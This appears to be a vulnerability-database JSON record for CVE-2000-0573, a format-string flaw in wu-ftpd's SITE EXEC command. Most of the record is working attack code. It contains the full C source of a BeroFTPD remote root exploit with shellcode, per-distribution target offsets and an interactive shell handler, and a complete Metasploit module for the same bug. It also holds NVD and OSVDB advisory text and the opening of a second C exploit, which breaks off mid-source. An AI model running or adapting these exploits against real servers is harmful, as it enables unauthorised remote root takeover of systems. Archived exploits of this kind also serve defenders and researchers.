{"id": "EDB-ID:269", "type": "exploitdb", "bulletinFamily": "exploit", "title": "BeroFTPD 1.3.41 - Remote Root Exploit Linux x86", "description": "BeroFTPD 1.3.4(1) Linux x86 Remote Root Exploit. CVE-2000-0573. Remote exploit for linux platform", "published": "2001-05-08T00:00:00", "modified": "2001-05-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/269/", "reporter": "qitest1", "references": [], "cvelist": ["CVE-2000-0573"], "lastseen": "2016-01-31T12:03:33", "viewCount": 18, "enchantments": {"score": {"value": 8.3, "vector": "NONE", "modified": "2016-01-31T12:03:33", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2000-0573"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84534"]}, {"type": "exploitdb", "idList": ["EDB-ID:16311", "EDB-ID:20031", "EDB-ID:201", "EDB-ID:20032", "EDB-ID:20030", "EDB-ID:239"]}, {"type": "nessus", "idList": ["WU_FTPD_SITE_EXEC.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:11805"]}, {"type": "canvas", "idList": ["WUFTPD_SEXEC"]}, {"type": "cert", "idList": ["VU:29823"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/FTP/WUFTPD_SITE_EXEC_FORMAT"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231010452", "OPENVAS:10452"]}], "modified": "2016-01-31T12:03:33", "rev": 2}, "vulnersScore": 8.3}, "sourceHref": "https://www.exploit-db.com/download/269/", "sourceData": "/* \r\n * BeroFTPD 1.3.4(1) Linux x86 remote root exploit \r\n * by qitest1 - 5/05/2001\r\n *\r\n * BeroFTPD is an ftpd derived from wuftpd sources. This code\r\n * exploits the format bug of the site exec cmd, well known to be\r\n * present in wuftpd-2.6.0 and derived daemons. BeroFTPD 1.3.4(1) \r\n * is the current version at the moment. \r\n * \r\n * JUST SAMPLE CODE. For different platforms you have to try with\r\n * different offsets for different retaddrs. You see.. =) \r\n *\r\n * Greets: Nail, Norby, Berserker.\r\n * 69 rulez.. ;P\r\n */\r\n\r\n#include <stdio.h> \r\n#include <stdlib.h> \r\n#include <getopt.h>\r\n#include <errno.h> \r\n#include <netdb.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <netinet/in.h>\r\n\r\nstruct targ\r\n{\r\n int\t\t\tdef;\r\n char \t\t*descr;\r\n unsigned long int \tenbuf;\r\n int\t\t\tdawlen;\r\n};\r\n\r\nstruct targ target[]=\r\n {\t\t\t\r\n {0, \"RedHat 6.2 with BeroFTPD 1.3.4(1) from tar.gz\", 0xded, 6},\r\n {1, \"Slackware 7.0 with BeroFTPD 1.3.4(1) from tar.gz\", 0x1170, 12}, \r\n {2, \"Mandrake 7.1 with BeroFTPD 1.3.4(1) from rpm\", 0xdf1, 6}, \r\n {69, NULL, 0, 0}\r\n };\r\n\r\n /* 15 byte x86/linux PIC read() shellcode by lorian / teso\r\n */\r\nunsigned char shellcode_read[] =\r\n \"\\x33\\xdb\" /* xorl %ebx, %ebx */\r\n \"\\xf7\\xe3\" /* mull %ebx */\r\n \"\\xb0\\x03\" /* movb $3, %al */\r\n \"\\x8b\\xcc\" /* movl %esp, %ecx */\r\n \"\\x68\\xb2\\x00\\xcd\\x80\" /* push 0x80CDxxB2 */\r\n \"\\xff\\xff\\xe4\"; /* jmp %esp */\r\n\r\nunsigned char shellcode[] =\t/* Lam3rZ code */\r\n \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb0\\x46\\xcd\\x80\\x31\\xc0\"\r\n \"\\x31\\xdb\\x43\\x89\\xd9\\x41\\xb0\\x3f\\xcd\\x80\\xeb\\x6b\"\r\n \"\\x5e\\x31\\xc0\\x31\\xc9\\x8d\\x5e\\x01\\x88\\x46\\x04\\x66\"\r\n \"\\xb9\\xff\\x01\\xb0\\x27\\xcd\\x80\\x31\\xc0\\x8d\\x5e\\x01\"\r\n \"\\xb0\\x3d\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x8d\\x5e\\x08\\x89\"\r\n \"\\x43\\x02\\x31\\xc9\\xfe\\xc9\\x31\\xc0\\x8d\\x5e\\x08\\xb0\"\r\n \"\\x0c\\xcd\\x80\\xfe\\xc9\\x75\\xf3\\x31\\xc0\\x88\\x46\\x09\"\r\n \"\\x8d\\x5e\\x08\\xb0\\x3d\\xcd\\x80\\xfe\\x0e\\xb0\\x30\\xfe\"\r\n \"\\xc8\\x88\\x46\\x04\\x31\\xc0\\x88\\x46\\x07\\x89\\x76\\x08\"\r\n \"\\x89\\x46\\x0c\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xb0\"\r\n \"\\x0b\\xcd\\x80\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\\xe8\"\r\n \"\\x90\\xff\\xff\\xff\\x30\\x62\\x69\\x6e\\x30\\x73\\x68\\x31\"\r\n \"\\x2e\\x2e\\x31\\x31\";\r\n\r\nchar \t\t \tfmtstr[1024];\r\nint\t\t\tsock;\r\nint\t\t\tsel;\r\nint\t\t\toffset;\r\nunsigned long int retloc;\r\nunsigned long int \tbufaddr;\r\nunsigned long int\ttmpaddr;\r\n\t\r\nvoid \t\tfmtstr_build(unsigned long int bufaddr, unsigned long int retloc);\r\nvoid \t\txpad_cat (unsigned char *fabuf, unsigned long int addr);\r\nvoid \t\tretloc_find(void);\r\nvoid \t\tshellami(int sock);\r\nvoid\t\tlogin(void);\r\nvoid\t\tusage(char *progname);\r\nint \t\tconn2host(char *host, int port);\r\n\r\nmain(int argc, char *argv[])\r\n{\r\nchar\t\trbuf[1024];\r\nchar\t\t*host = NULL;\r\nint \t\tcnt;\r\n\r\n printf(\"\\n BeroFTPD 1.3.4(1) exploit by qitest1\\n\\n\");\r\n if(argc == 1)\r\n\tusage(argv[0]);\r\n while((cnt = getopt(argc,argv,\"h:t:o:\")) != EOF)\r\n {\r\n switch(cnt)\r\n {\r\n case 'h':\r\n host = strdup(optarg);\r\n break;\r\n case 't':\r\n sel = atoi(optarg); \r\n break;\r\n case 'o':\r\n offset = atoi(optarg);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n }\r\n\r\n if(host == NULL)\r\n\tusage(argv[0]);\r\n\r\n printf(\"+Host: %s\\n as: %s\\n\", host, target[sel].descr);\r\n\r\n printf(\"+Connecting to %s...\\n\", host);\r\n sock = conn2host(host, 21);\r\n printf(\" connected\\n\");\r\n\r\n printf(\"+Receiving banner...\\n\");\r\n recv(sock, rbuf, 1024, 0);\r\n printf(\"%s\", rbuf);\r\n memset(rbuf, 0, 1024);\r\n printf(\" received\\n\");\r\n\r\n printf(\"+Logging in...\\n\");\r\n login();\r\n printf(\" logged in\\n\");\r\n\r\n printf(\"+Searching retloc...\\n\");\r\n retloc_find();\r\n printf(\" found: %p\\n\", retloc);\r\n\r\n printf(\"+Searching bufaddr...\\n\");\r\n bufaddr = tmpaddr + target[sel].enbuf;\r\n printf(\" found: %p + offset = \", bufaddr);\r\n bufaddr += offset;\r\n printf(\"%p\\n\", bufaddr); \r\n\r\n printf(\"+Preparing shellcode...\\n\");\r\n shellcode_read[strlen(shellcode_read)] = (unsigned char) strlen(shellcode);\r\n printf(\" shellcode ready\\n\");\r\n\r\n printf(\"+Building fmtstr...\\n\");\r\n fmtstr_build(bufaddr, retloc);\r\n printf(\" fmtstr builded\\n\"); \r\n \r\n printf(\"+Sending fmtstr...\\n\");\r\n send(sock, fmtstr, strlen(fmtstr), 0);\r\n printf(\" fmtstr sent\\n\");\r\n recv(sock, rbuf, 1024, 0);\r\n sleep(1);\r\n send(sock, shellcode, strlen(shellcode), 0);\r\n sleep(2);\r\n printf(\"+Entering love mode...\\n\"); /* Nail teachs.. ;-) */\r\n shellami(sock); \r\n\r\n}\r\n\r\nvoid\r\nfmtstr_build(unsigned long int bufaddr, unsigned long int retloc)\r\n{\r\nint i;\r\nint\t\t eat = 136;\r\nint wlen = 428;\r\nint tow;\r\nint freespz;\r\nchar\t\t f[1024];\r\nunsigned long int soul69 = 0x69696969; /* That's amore.. =) */\r\nunsigned char retaddr[4];\r\n\r\n for(i = 0; i < 4; ++i)\r\n\tretaddr[i] = (bufaddr >> (i << 3)) & 0xff;\r\n\r\n wlen -= target[sel].dawlen;\r\n f[0] = 0;\r\n for(i = 0; i < eat; i++)\r\n strcat(f, \"%.f\");\r\n\r\n strcat(fmtstr, \"SITE EXEC \");\r\n strcat(fmtstr, \" \");\r\n xpad_cat(fmtstr, retloc);\r\n xpad_cat(fmtstr, soul69);\r\n xpad_cat(fmtstr, retloc + 1);\r\n xpad_cat(fmtstr, soul69);\r\n xpad_cat(fmtstr, retloc + 2);\r\n xpad_cat(fmtstr, soul69);\r\n xpad_cat(fmtstr, retloc + 3);\r\n strcat(fmtstr, f);\r\n strcat(fmtstr, \"%x\");\r\n\r\n /* Code by teso\r\n */\r\n tow = ((retaddr[0] + 0x100) - (wlen % 0x100)) % 0x100;\r\n if (tow < 10) tow += 0x100; \r\n sprintf (fmtstr + strlen (fmtstr), \"%%%dd%%n\", tow);\r\n wlen += tow;\r\n\r\n tow = ((retaddr[1] + 0x100) - (wlen % 0x100)) % 0x100;\r\n if (tow < 10) tow += 0x100;\r\n sprintf (fmtstr + strlen (fmtstr), \"%%%dd%%n\", tow);\r\n wlen += tow;\r\n\r\n tow = ((retaddr[2] + 0x100) - (wlen % 0x100)) % 0x100;\r\n if (tow < 10) tow += 0x100;\r\n sprintf (fmtstr + strlen (fmtstr), \"%%%dd%%n\", tow);\r\n wlen += tow;\r\n\r\n tow = ((retaddr[3] + 0x100) - (wlen % 0x100)) % 0x100;\r\n if (tow < 10) tow += 0x100;\r\n sprintf (fmtstr + strlen (fmtstr), \"%%%dd%%n\", tow);\r\n wlen += tow;\r\n /* End here\r\n */\r\n\r\n freespz = 510 - strlen(fmtstr) - strlen(shellcode_read) - 1;\r\n for(i = 0; i < freespz ; i++)\r\n\tstrcat(fmtstr, \"\\x90\");\r\n strcat(fmtstr, shellcode_read);\r\n\r\n strcat(fmtstr, \"\\n\");\r\n\r\n}\r\n\r\n /* Code by teso\r\n */\r\nvoid xpad_cat (unsigned char *fabuf, unsigned long int addr)\r\n{\r\n int i;\r\n unsigned char c;\r\n\r\n for (i = 0 ; i <= 3 ; ++i) {\r\n switch (i) {\r\n case (0):\r\n c = (unsigned char) ((addr & 0x000000ff) );\r\n break;\r\n case (1):\r\n c = (unsigned char) ((addr & 0x0000ff00) >> 8);\r\n break;\r\n case (2):\r\n c = (unsigned char) ((addr & 0x00ff0000) >> 16);\r\n break;\r\n case (3):\r\n c = (unsigned char) ((addr & 0xff000000) >> 24);\r\n break;\r\n }\r\n if (c == 0xff)\r\n sprintf (fabuf + strlen (fabuf), \"%c\", c);\r\n\r\n sprintf (fabuf + strlen (fabuf), \"%c\", c);\r\n }\r\n\r\n return;\r\n}\r\n /* End here\r\n */\r\n\r\nvoid\r\nretloc_find(void)\r\n{\r\nint\t\ti;\r\nchar\t\trbuf[1024];\r\nchar\t\tsbuf[1024];\r\nchar\t\t*ptr;\r\n\r\n strcpy(sbuf, \"SITE EXEC \");\r\n for(i = 0; i < 6; i++)\r\n\tstrcat(sbuf, \"%p \");\r\n strcat(sbuf, \"\\n\");\r\n send(sock, sbuf, strlen(sbuf), 0); \r\n\r\n recv(sock, rbuf, 1024, 0);\r\n ptr = rbuf;\r\n for(i = 0; i < 5; i++)\r\n\t{\r\n\t while(*ptr != ' ')\r\n\t \tptr++;\r\n\t ptr++;\r\n\t}\r\n ptr[strlen(ptr) - 2] = '\\x00';\t\r\n ptr[strlen(ptr) - 1] = '\\x00';\r\n sscanf(ptr, \"%p\", &retloc);\r\n sscanf(ptr, \"%p\", &tmpaddr);\r\n retloc -= 0x40;\r\n\r\n}\r\n\r\nvoid\r\nshellami(int sock)\r\n{\r\nint \t\tn;\r\nchar \t\trecvbuf[1024];\r\nchar\t\t*cmd = \"id; uname -a\\n\";\r\nfd_set \t\trset;\r\n\r\n send(sock, cmd, strlen(cmd), 0);\r\n\r\n while (1)\r\n {\r\n FD_ZERO(&rset);\r\n FD_SET(sock,&rset);\r\n FD_SET(STDIN_FILENO,&rset);\r\n select(sock+1,&rset,NULL,NULL,NULL);\r\n if (FD_ISSET(sock,&rset))\r\n {\r\n n=read(sock,recvbuf,1024);\r\n if (n <= 0)\r\n {\r\n printf(\"Connection closed by foreign host.\\n\");\r\n exit(0);\r\n }\r\n recvbuf[n]=0;\r\n printf(\"%s\",recvbuf);\r\n }\r\n if (FD_ISSET(STDIN_FILENO,&rset))\r\n {\r\n n=read(STDIN_FILENO,recvbuf,1024);\r\n if (n>0)\r\n {\r\n recvbuf[n]=0;\r\n write(sock,recvbuf,n);\r\n }\r\n }\r\n }\r\n return;\r\n}\r\n\r\nint\r\nconn2host(char *host, int port)\r\n{\r\nint \t\tsockfd; \r\nstruct \t\thostent *he;\r\nstruct \t\tsockaddr_in their_addr; \r\n\r\n if ((he=gethostbyname(host)) == NULL)\r\n\t{ \r\n herror(\"gethostbyname\");\r\n exit(1);\r\n\t}\r\n if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)\r\n\t{\r\n perror(\"socket\");\r\n exit(1);\r\n\t}\r\n\r\n their_addr.sin_family = AF_INET; \r\n their_addr.sin_port = htons(port); \r\n their_addr.sin_addr = *((struct in_addr *)he->h_addr);\r\n bzero(&(their_addr.sin_zero), 8); \r\n\r\n if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)\r\n\t{\r\n perror(\"connect\");\r\n exit(1);\r\n\t}\r\n \r\n return(sockfd);\r\n\r\n}\r\n\r\nvoid\r\nlogin(void)\r\n{\r\nchar\t\t*user = \"USER anonymous\\n\";\r\nchar\t\t*pass = \"PASS guest@\\n\";\r\nchar\t\trbuf[1024];\r\n\r\n send(sock, user, strlen(user), 0);\r\n recv(sock, rbuf, 1024, 0);\r\n memset(rbuf, 0, 1024);\r\n send(sock, pass, strlen(pass), 0);\r\n while(strstr(rbuf, \"login ok\") == NULL)\r\n\t{\r\n\t memset(rbuf, 0, 1024);\r\n\t recv(sock, rbuf, 1024, 0);\r\n\t}\r\n\r\n}\r\n\r\nvoid\r\nusage(char *progname)\r\n{\r\nint\t\ti = 0;\r\n \r\n printf(\"Usage: %s [options]\\n\", progname);\r\n printf(\"Options:\\n\"\r\n\t \" -h hostname\\n\"\r\n\t \" -t target\\n\"\r\n\t \" -o offset\\n\"\r\n\t \"Available targets:\\n\");\r\n while(target[i].def != 69)\r\n\t{ \r\n printf(\" %d) %s\\n\", target[i].def, target[i].descr);\r\n i++;\r\n\t} \r\n\r\n exit(1);\r\n\r\n}\r\n\r\n\r\n// milw0rm.com [2001-05-08]\r\n", "osvdbidlist": ["11805"]}

{"cve": [{"lastseen": "2020-10-03T11:36:56", "description": "The lreply function in wu-ftpd 2.6.0 and earlier does not properly cleanse an untrusted format string, which allows remote attackers to execute arbitrary commands via the SITE EXEC command.", "edition": 3, "cvss3": {}, "published": "2000-07-07T04:00:00", "title": "CVE-2000-0573", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2000-0573"], "modified": "2018-05-03T01:29:00", "cpe": ["cpe:/o:hp:hp-ux:11.00"], "id": "CVE-2000-0573", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0573", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:hp:hp-ux:11.00:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:16:06", "description": "", "published": "2009-12-31T00:00:00", "type": "packetstorm", "title": "Wu-ftpd SITE EXEC/INDEX Format String Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "2009-12-31T00:00:00", "id": "PACKETSTORM:84534", "href": "https://packetstormsecurity.com/files/84534/Wu-ftpd-SITE-EXEC-INDEX-Format-String-Vulnerability.html", "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. \n## http://metasploit.com/framework/ \n### \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Ftp \ninclude Msf::Exploit::FormatString \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'wu-ftpd SITE EXEC/INDEX Format String Vulnerability', \n'Description' => %q{ \nThis module exploits a format string vulnerability in versions of the \nWashington University FTP server older than 2.6.1. By executing \nspecially crafted SITE EXEC or SITE INDEX commands containing format \nspecifiers, an attacker can corrupt memory and execute arbitrary code. \n}, \n'Author' => \n[ \n'jduck' \n], \n'References' => \n[ \n['OSVDB', '11805'], \n['CVE', '2000-0573'], \n['BID', '1387'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'PrependChrootBreak' => true \n}, \n'Privileged' => true, \n'Payload' => \n{ \n# format string max length \n'Space' => 256, \n# NOTE: \\xff's need to be doubled (per ftp/telnet stuff) \n'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x25\\x2f\", \n'DisableNops' => 'True', \n'StackAdjustment' => -1500 \n}, \n'Platform' => [ 'linux' ], \n'Targets' => \n[ \n# \n# Automatic targeting via fingerprinting \n# \n[ 'Automatic Targeting', { 'auto' => true } ], \n \n# \n# specific targets \n# \n[ 'Slackware 2.1 (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)', \n{ \n'UseDPA' => false, \n'PadBytes' => 3, \n'NumPops' => 8, \n'AddrPops' => 100, \n'Offset' => -2088, # offset to stack return \n'Writable' => 0xbfffde26, # stack, avoid badchars \n'FlowHook' => -1, # auto now... 0xbffff1e4 # stack return addr \n} \n], \n# these aren't exploitable (using built-in, stripped down vsprintf, no %n) \n#[ 'RedHat 5.2 (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998)', \n#[ 'RedHat 6.0 (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999)', \n#[ 'RedHat 6.1 (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999)', \n[ 'RedHat 6.2 (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000)', \n{ \n'UseDPA' => true, \n'PadBytes' => 2, \n'NumPops' => 276, \n'AddrPops' => 2, \n'Offset' => -17664, # offset to stack return \n'Writable' => 0x806e726, # bss \n#'Writable' => 0xbfff0126, # stack, avoid badchars \n'FlowHook' => -1, # auto now... 0xbfffb028 # stack return addr \n#'FlowHook' => 0x806e1e0 # GOT of sprintf \n} \n], \n \n# \n# this one will detect the parameters automagicly \n# \n[ 'Debug', \n{ \n'UseDPA' => false, \n'PadBytes' => 0, \n'NumPops' => 0, \n'AddrPops' => -1, \n'Offset' => -1, \n'Writable' => 0x41414242, # \n'FlowHook' => 0x43434545 # \n} \n], \n], \n'DefaultTarget' => 0)) \nregister_options( \n[ \nOpt::RPORT(21), \n], self.class ) \nend \n \n \ndef check \nconnect_login \nprint_status(\"FTP Banner: #{banner.strip}\") \nstatus = Exploit::CheckCode::Safe \nif banner =~ /Version wu-2\\.(4|5)/ \nstatus = Exploit::CheckCode::Appears \nelsif banner =~ /Version wu-2\\.6\\.0/ \nstatus = Exploit::CheckCode::Appears \nend \n \n# NOTE: vulnerable and exploitable might not mean the same thing here :) \nif not fmtstr_detect_vulnerable \nstatus = Exploit::CheckCode::Safe \nend \nif not fmtstr_detect_exploitable \nstatus = Exploit::CheckCode::Safe \nend \ndisconnect \nreturn status \nend \n \n \ndef exploit \n \nconnect_login \n \n# Use a copy of the target \nmytarget = target \n \nif (target['auto']) \nmytarget = nil \n \nprint_status(\"Automatically detecting the target...\") \nif (banner and (m = banner.match(/\\(Version wu-(.*)\\) ready/))) then \nprint_status(\"FTP Banner: #{banner.strip}\") \nversion = m[1] \nelse \nprint_status(\"No matching target\") \nreturn \nend \n \nregexp = Regexp.escape(version) \nself.targets.each do |t| \nif (t.name =~ /#{regexp}/) then \nmytarget = t \nbreak \nend \nend \n \nif (not mytarget) \nprint_status(\"No matching target\") \nreturn \nend \n \nprint_status(\"Selected Target: #{mytarget.name}\") \nelse \nprint_status(\"Trying target #{mytarget.name}...\") \nif banner \nprint_status(\"FTP Banner: #{banner.strip}\") \nend \nend \n \n# proceed with chosen target... \n \n# detect stuff! \nif mytarget.name == \"Debug\" \n#fmtstr_set_caps(true, true) \n# dump the stack, so we can detect stuff magically \nprint_status(\"Dumping the stack...\") \nstack = Array.new \nextra = \"aaaabbbb\" \n1000.times do |x| \ndw = fmtstr_stack_read(x+1, extra) \nbreak if not dw \nstack << dw \nend \n \nstack_data = stack.pack('V*') \nprint_status(\"Obtained #{stack.length*4} bytes of stack data:\\n\" + Rex::Text.to_hex_dump(stack_data)) \n \n# detect the number of pad bytes \nidx = stack_data.index(\"aaaabbbb\") \nif not idx \nprint_status(\"Whoa, didn't find the static bytes on the stack!\") \nreturn \nend \nnum_pad = 0 \nnum_pad = 4 - (idx % 4) if (idx % 4) \nmytarget.opts['PadBytes'] = num_pad \n \n# calculate the number of pops needed to hit our addr \nnum_pops = (idx + num_pad) / 4 \nmytarget.opts['NumPops'] = num_pops \nelse \nnum_pad = mytarget['PadBytes'] \nnum_pops = mytarget['NumPops'] \nsc_loc = mytarget['Writable'] \nret = mytarget['FlowHook'] \nend \n \nprint_status(\"Number of pad bytes: #{num_pad}\") \nprint_status(\"Number of pops: #{num_pops}\") \n \n# debugging -> don't try it! \nreturn if mytarget.name == \"Debug\" \n#print_status(\"ATTACH!\") \n#sleep(5) \n \nfmtstr_detect_caps \n \n# compute the stack return address using the fmt to leak memory \naddr_pops = mytarget['AddrPops'] \noffset = mytarget['Offset'] \nif addr_pops > 0 \nstackaddr = fmtstr_stack_read(addr_pops) \nprint_status(\"Read %#x from offset %d\" % [stackaddr, addr_pops]) \nret = stackaddr + offset \nend \n \nprint_status(\"Writing shellcode to: %#x\" % sc_loc) \nprint_status(\"Hijacking control via %#x\" % ret) \n \n \n# no extra bytes before the padding.. \nnum_start = 0 \n \n# write shellcode to 'writable' \narr = fmtstr_gen_array_from_buf(sc_loc, payload.encoded, mytarget) \n \n# process it in groups of 24 (max ~400 bytes per command) \nsc_num = 1 \nwhile arr.length > 0 \nprint_status(\"Sending part #{sc_num} of the payload...\") \nsc_num += 1 \n \nnarr = arr.slice!(0..24) \n \nfmtbuf = fmtstr_gen_from_array(num_start, narr, mytarget) \n# a space allows the next part to start with a '/' \nfmtbuf[num_pad-1,1] = \" \" \nfmtbuf.gsub!(/\\xff/, \"\\xff\\xff\") \nif ((res = send_cmd(['SITE', 'EXEC', fmtbuf], true))) \nif res[0,4] == \"500 \" \nthrow \"Crap! Something went wrong when uploading the payload...\" \nend \nend \nend \n \n \n# write 'writable' addr to flowhook (execute shellcode) \n# NOTE: the resulting two writes must be done at the same time \nprint_status(\"Attempting to write %#x to %#x..\" % [sc_loc, ret]) \n \nfmtbuf = generate_fmt_two_shorts(num_start, ret, sc_loc, mytarget) \n# a space allows the next part to start with a '/' \nfmtbuf[num_pad-1,1] = \" \" \nfmtbuf.gsub!(/\\xff/, \"\\xff\\xff\") \n# don't wait for the response here :) \nres = send_cmd(['SITE', 'EXEC', fmtbuf], false) \n \nprint_status(\"Your payload should have executed now...\") \nhandler \nend \n \n \n# \n# these two functions are used to read stack memory \n# (used by fmtstr_stack_read() \n# \ndef trigger_fmt(fmtstr) \nreturn nil if fmtstr.length >= (512 - (4+1 + 4+1 + 2 + 2)) \nsend_cmd(['SITE', 'EXEC', 'x', fmtstr], true) \nend \n \ndef extract_fmt_output(res) \nif res[0,4] == \"500 \" \n#throw \"Crap! Something went wrong while dumping the stack...\" \nreturn nil \nend \nret = res.strip.split(/\\r?\\n/)[0] \nret = ret[6,ret.length] \nreturn ret \nend \n \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84534/wuftpd_site_exec_format.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2000-0573"], "edition": 1, "description": "## Vulnerability Description\nWU-FTPD contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered due to a format string error in the site_exec() function. By sending a specially crafted argument to the SITE EXEC command, a remote attacker could potentially execute arbitrary code.\n## Solution Description\nUpgrade to version 2.6.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nWU-FTPD contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered due to a format string error in the site_exec() function. By sending a specially crafted argument to the SITE EXEC command, a remote attacker could potentially execute arbitrary code.\n## References:\nVendor URL: http://www.wu-ftpd.org/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2000/20000623)\n[Vendor Specific Advisory URL](http://rhn.redhat.com/errata/RHSA-2000-039.html)\n[Vendor Specific Advisory URL](http://archives.neohapsis.com/archives/bugtraq/2000-06/0233.html)\n[Vendor Specific Advisory URL](ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2000-010.txt.asc)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/security/OpenLinux/CSSA-2000-020.0.txt)\n[Vendor Specific Advisory URL](http://archives.neohapsis.com/archives/freebsd/2000-07/0039.html)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/suse_security_announce_53.txt)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20000701-01-I)\nSnort Signature ID: 1971\n[Nessus Plugin ID:10452](https://vulners.com/search?query=pluginID:10452)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2000-06/0225.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2000-07/0093.html\nISS X-Force ID: 4773\nGeneric Exploit URL: http://www.securityfocus.com/archive/1/66367\n[CVE-2000-0573](https://vulners.com/cve/CVE-2000-0573)\nCIAC Advisory: k-054\nCERT VU: 29823\nCERT: CA-2000-13\nBugtraq ID: 1387\n", "modified": "2000-06-22T00:00:00", "published": "2000-06-22T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:11805", "id": "OSVDB:11805", "title": "WU-FTPD site_exec() Function Remote Format String", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T13:19:11", "description": "wu-ftpd 2.4.2/2.5 .0/2.6 .0 Remote Format String Stack Overwrite (1). CVE-2000-0573. Remote exploit for unix platform", "published": "1999-10-15T00:00:00", "type": "exploitdb", "title": "wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "1999-10-15T00:00:00", "id": "EDB-ID:20030", "href": "https://www.exploit-db.com/exploits/20030/", "sourceData": "source: http://www.securityfocus.com/bid/1387/info\r\n\r\nWashington University ftp daemon (wu-ftpd) is a very popular unix ftp server shipped with many distributions of Linux and other UNIX operating systems. Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC implementation. Because of user input going directly into a format string for a *printf function, it is possible to overwrite important data, such as a return address, on the stack. When this is accomplished, the function can jump into shellcode pointed to by the overwritten eip and execute arbitrary commands as root. While exploited in a manner similar to a buffer overflow, it is actually an input validation problem. Anonymous ftp is exploitable making it even more serious as attacks can come anonymously from anywhere on the internet.\r\n\r\nIt should be noted that the SITE INDEX command is affected as well. \r\n\r\n/*\r\n * VERY PRIVATE VERSION. DO NOT DISTRIBUTE. 15-10-1999\r\n *\r\n * WUFTPD 2.6.0 REMOTE ROOT EXPLOIT\r\n * by tf8\r\n *\r\n * *NOTE*: For ethical reasons, only an exploit for 2.6.0 will be\r\n * released (2.6.0 is the most popular version nowadays), and it\r\n * should suffice to proof this vulnerability concept.\r\n *\r\n * Site exec was never really *fixed*\r\n *\r\n * Greetz to portal (he is elite!#%$) and all #!security.is, glitch, DiGit,\r\n * \\x90, venglin, xz, MYT and lamagra.\r\n * Also greetings go to the WU-FTPD development team for including this\r\n * bug in ALL their versions.\r\n *\r\n * Fuck to wuuru (he is an idiot)\r\n *\r\n * Account is not required, anonymous access is enough :)\r\n *\r\n * VERY PRIVATE VERSION. DO NOT DISTRIBUTE. 15-10-1999\r\n */\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/time.h>\r\n#include <netdb.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <signal.h>\r\n#include <errno.h>\r\n\r\n#ifdef __linux\r\n#include <getopt.h>\r\n#endif\r\n\r\n#define MAKE_STR_FROM_RET(x) 